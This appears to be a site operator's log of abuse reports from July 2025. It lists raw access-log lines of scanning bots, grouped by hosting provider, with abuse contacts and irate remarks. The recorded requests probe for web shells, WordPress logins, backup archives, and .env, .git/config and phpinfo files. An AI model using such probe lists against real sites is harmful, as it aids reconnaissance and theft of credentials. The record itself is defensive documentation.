89.163.242.76 website*x.com – – [26/Jul/2025:08:16:51 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:17:23 +0200] „GET /userfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:18:07 +0200] „GET /userfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:18:42 +0200] „GET /delpaths.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:19:16 +0200] „GET /delpaths.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:19:51 +0200] „GET /gdftps.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:20:32 +0200] „GET /gdftps.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:21:13 +0200] „GET /hplfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:08:21:44 +0200] „GET /hplfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS134761 – CHINANET NINGXIA province ZHONGWEI IDC network – CHINA IS COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
anti-spam@chinatelecom.cn – DAILY REFERRER-SPAM TO THIS DUBIOUS WEBSITE AND THE PROVIDER DOES NOTHING!!!
203.33.203.148 www.website*x.com – – [26/Jul/2025:08:43:52 +0200] „GET / HTTP/1.0“ 403 – „http:// gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

AS132203 – Tencent Building, Kejizhongyi Avenue – VERY IGNORANT, VERY UNSECURE! – TENCENT IS COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
qcloud_net_duty@tencent.com – DAILY REFERRER-SPAM TO THIS DUBIOUS WEBSITE AND THE PROVIDER DOES NOTHING!!!
43.164.195.17 www.website*x.com – – [26/Jul/2025:09:10:15 +0200] „GET / HTTP/1.0“ 403 – „http:// gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“

ABUSE-MAIL NR. 6

AS8075 – Microsoft Corporation – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – Das ONLINE-FORMULAR IST EIN NoGo! Abuse per Emails ist STANDARD!!!
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:01 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:01 +0200] „GET /wp-links.php HTTP/1.0“ 302 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:16 +0200] „GET /lock6.php HTTP/1.0“ 302 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:31 +0200] „GET /abe.php HTTP/1.0“ 302 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:46 +0200] „GET /wp-includes/IXR/about.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /wp-content/plugins/wp-login.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /.well-known/index.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /cgi-bin/admin.phphttps://explorebabel.com/.well-known/acme-challenge/index.php HTTP/1.0“ 403 – „-“ „-“
130.33.61.100 website*x.com – – [26/Jul/2025:06:33:47 +0200] „GET /wp-admin/user/cloud.php HTTP/1.0“ 302 – „-“ „-“
… and so on!!!

AS24961 – WIIT AG – VERY IGNORANT, DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@myloc.de
89.163.242.76 website*x.com – – [26/Jul/2025:10:25:16 +0200] „GET /thoms.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:26:46 +0200] „GET /thoms.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:28:17 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:29:52 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:31:21 +0200] „GET /userfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:32:29 +0200] „GET /userfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:33:56 +0200] „GET /delpaths.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:35:34 +0200] „GET /delpaths.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:37:10 +0200] „GET /gdftps.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:38:35 +0200] „GET /gdftps.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:40:04 +0200] „GET /hplfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:10:41:34 +0200] „GET /hplfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

ABUSE-MAIL NR. 7

AS16276 – OVH SAS – OVH AGAIN AND AGAIN EVERY DAY!!!
abuse@ovh.net
145.239.10.137 website*x.com – – [26/Jul/2025:12:09:44 +0200] „GET /contact.php HTTP/1.0“ 302 20 „http://website*x.com/contact.php“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1“
145.239.10.137 website*x.com – – [26/Jul/2025:12:09:44 +0200] „GET /function.php HTTP/1.0“ 302 20 „http://website*x.com/function.php“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1“

AS24961 – WIIT AG – VERY IGNORANT, DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@myloc.de – THIRD ABUSE ON THIS DAY!!! – VERY UNSECURE!!!
89.163.242.76 website*x.com – – [26/Jul/2025:12:12:57 +0200] „GET /thoms.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:12:13:13 +0200] „GET /thoms.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:12:13:31 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:12:13:47 +0200] „GET /inputs.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:12:14:05 +0200] „GET /userfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:12:14:24 +0200] „GET /userfuns.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:12:14:40 +0200] „GET /delpaths.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
89.163.242.76 website*x.com – – [26/Jul/2025:12:14:57 +0200] „GET /delpaths.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS8075 – Microsoft Corporation – VERY IGNORANT, VERY UNSECURE! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@microsoft.com – Das ONLINE-FORMULAR IST EIN NoGo! Abuse per Emails ist STANDARD!!!
20.18.74.43 website*x.com – – [26/Jul/2025:15:53:23 +0200] „GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.0“ 403 – „-“ „-“
20.18.74.43 website*x.com – – [26/Jul/2025:15:53:24 +0200] „GET /about.php/wp-includes/Text/network.php HTTP/1.0“ 302 – „-“ „-“
20.18.74.43 website*x.com – – [26/Jul/2025:15:53:39 +0200] „GET /wp-admin/js/alfa-rex.php HTTP/1.0“ 302 – „-“ „-“
20.18.74.43 website*x.com – – [26/Jul/2025:15:53:54 +0200] „GET /wp-content/themes/wp-pridmag/lock.php/wp-admin/user/admin.php/wp-content/uploads/json.php HTTP/1.0“ 403 – „-“ „-“
20.18.74.43 website*x.com – – [26/Jul/2025:15:53:54 +0200] „GET /css/item.php HTTP/1.0“ 403 – „-“ „-“
20.18.74.43 website*x.com – – [26/Jul/2025:15:53:54 +0200] „GET /.well-known/acme-challenge/plugins.php/wp-includes/certificates/plugins.php HTTP/1.0“ 403 – „-“ „-“
20.18.74.43 website*x.com – – [26/Jul/2025:15:53:54 +0200] „GET /wp-mail.php/wp-includes/ID3/rk2.php HTTP/1.0“ 302 – „-“ „-“
20.18.74.43 website*x.com – – [26/Jul/2025:15:54:09 +0200] „GET /wp-content/themes/astra/inc/network.php HTTP/1.0“ 403 – „-“ „-“

ABUSE-MAIL NR. 8

AS51167 – Contabo GmbH – VERY IGNORANT, DAILY HACKER-IDIOTS! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@contabo.de – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!!
167.86.74.247 website*x.com – – [26/Jul/2025:11:44:57 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [26/Jul/2025:11:44:57 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [26/Jul/2025:11:44:57 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“

AS7859 – pair Networks – VERY IGNORANT! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@pair.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!!
2607:f440::4227:6d09 website*x.com – – [26/Jul/2025:12:26:18 +0200] „HEAD /backup.zip HTTP/1.0“ 403 – „-“ „-“
2607:f440::4227:6d09 website*x.com – – [26/Jul/2025:12:26:18 +0200] „HEAD /Archive.zip HTTP/1.0“ 403 – „-“ „-“
2607:f440::4227:6d09 website*x.com – – [26/Jul/2025:12:26:18 +0200] „HEAD /website*x.zip HTTP/1.0“ 403 – „-“ „-“
2607:f440::4227:6d09 website*x.com – – [26/Jul/2025:12:26:19 +0200] „HEAD /website*x.com.zip HTTP/1.0“ 403 – „-“ „-“

AS216071 – SERVERS TECH FZCO – REFERRER-SPAM AGAIN AND AGAIN TO THIS DUBIOUS WEBSITE! VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@vdsina.com – NO ANSWER…NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!!
77.238.225.146 www.website*x.com – – [26/Jul/2025:12:32:17 +0200] „GET / HTTP/1.0“ 403 – „https://GBNADVISORS.COM“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36“

ABUSE-MAIL NR. 9

AS8560 – IONOS SE – IONOS EVERY DAY AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ionos.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
74.208.111.78 website*x.de – – [26/Jul/2025:12:39:47 +0200] „GET /style.php HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
74.208.111.78 website*x.de – – [26/Jul/2025:12:40:02 +0200] „GET /style.php HTTP/1.0“ 403 – „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS6805 – Telefonica Germany GmbH & Co.OHG – DAILY TRY TO COPY PICTURES!!! – THERE ARE ALSO PICTURES WITH COPYRIGHT!!! – NETWORK IS BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse.de@telefonica.com – WE HAS REPORT THIS MANY TIMES! – THE PROVIDER DOES… NOTHING!!!
176.3.136.13 www.website*x.de – – [26/Jul/2025:13:22:48 +0200] „GET /wp-content/uploads/202X/12/bild*x-180×180.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.136.13 www.website*x.de – – [26/Jul/2025:13:22:49 +0200] „GET /wp-content/uploads/202X/05/bild*x_150px.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.136.13 www.website*x.de – – [26/Jul/2025:13:22:49 +0200] „GET /wp-content/uploads/202X/12/bild*x-192×192.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.136.13 www.website*x.de – – [26/Jul/2025:13:22:49 +0200] „GET /wp-content/uploads/202X/12/bild*x-32×32.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.136.13 www.website*x.de – – [26/Jul/2025:13:22:50 +0200] „GET /wp-content/uploads/202X/01/bild*x.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.136.13 www.website*x.de – – [26/Jul/2025:13:22:50 +0200] „GET /wp-content/uploads/202X/12/bild*x-270×270.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“

ABUSE-MAIL NR. 10

AS211138 – Private-Hosting di Cipriano oscar – EVERY DAY AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
info@fasthosting.net.za – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
41.216.188.205 website*x.com – – [26/Jul/2025:17:24:24 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:121.0) Gecko/20100101 Firefox/121.0“
41.216.188.205 website*x.com – – [26/Jul/2025:17:24:24 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
41.216.188.205 website*x.com – – [26/Jul/2025:17:24:24 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://www.google.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:119.0) Gecko/20100101 Firefox/119.0“

AS210278 – Sky Italia srl – THE NETWORK 2a0e:400::/25 IS NOW ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@skytv.it
2a0e:424:3a83:0:89da:e103:fd07:62d4 website*x.com – – [26/Jul/2025:19:14:34 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

AS8560 – IONOS SE – IONOS EVERY DAY AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ionos.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
74.208.111.78 website*x.com – – [26/Jul/2025:21:53:10 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
74.208.111.78 website*x.com – – [26/Jul/2025:21:53:22 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

AS396982 – Google LLC – GOOGLE EVERY DAY AGAIN AND AGAIN!!! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
google-cloud-compliance@google.com
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:52 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:52 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.56.58.166 website*x.com – – [26/Jul/2025:22:51:53 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

SONNTAG, 11 Abuse-Mails an jeweils 2 bis 4 Provider!

ABUSE-MAIL NR. 1

AS23470 – ReliableSite.Net LLC – SEHR VORBILDLICHER PROVIDER, ANTWORTET AUF ABUSE-MAIL UND GIBT INFOS!!!
abuse@reliablesite.net
172.93.102.106 website*x.com – – [27/Jul/2025:03:00:17 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozila/5.0“

AS401116 – Nybula LLC – VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@nybula.com – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
196.251.66.105 website*x.com – – [27/Jul/2025:07:51:04 +0200] „GET /a.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36“

AS211590 – Bucklog SARL – ALSO VERY UNWANTED! – COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
bucklog@proton.me – NO ANSWER… NO RESPONSE… NOTHING IN OUR ABUSE EMAILS!!! – THIS IS VERY IGNORANT!
185.177.72.210 website*x.com – – [27/Jul/2025:08:09:08 +0200] „GET /.git/HEAD HTTP/1.0“ 403 – „-“ „-“
185.177.72.210 website*x.com – – [27/Jul/2025:08:09:18 +0200] „GET /httpd.conf HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.210 website*x.com – – [27/Jul/2025:08:09:18 +0200] „GET /apps/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
185.177.72.210 website*x.com – – [27/Jul/2025:08:09:18 +0200] „GET /php_info.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
+
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:19 +0200] „GET / HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:24 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:25 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:25 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:25 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:25 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:25 +0200] „GET /tool/view/phpinfo.view.php HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:25 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:30 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „python-httpx/0.28.1“
185.177.72.13 website*x.com – – [27/Jul/2025:15:36:30 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „python-httpx/0.28.1“

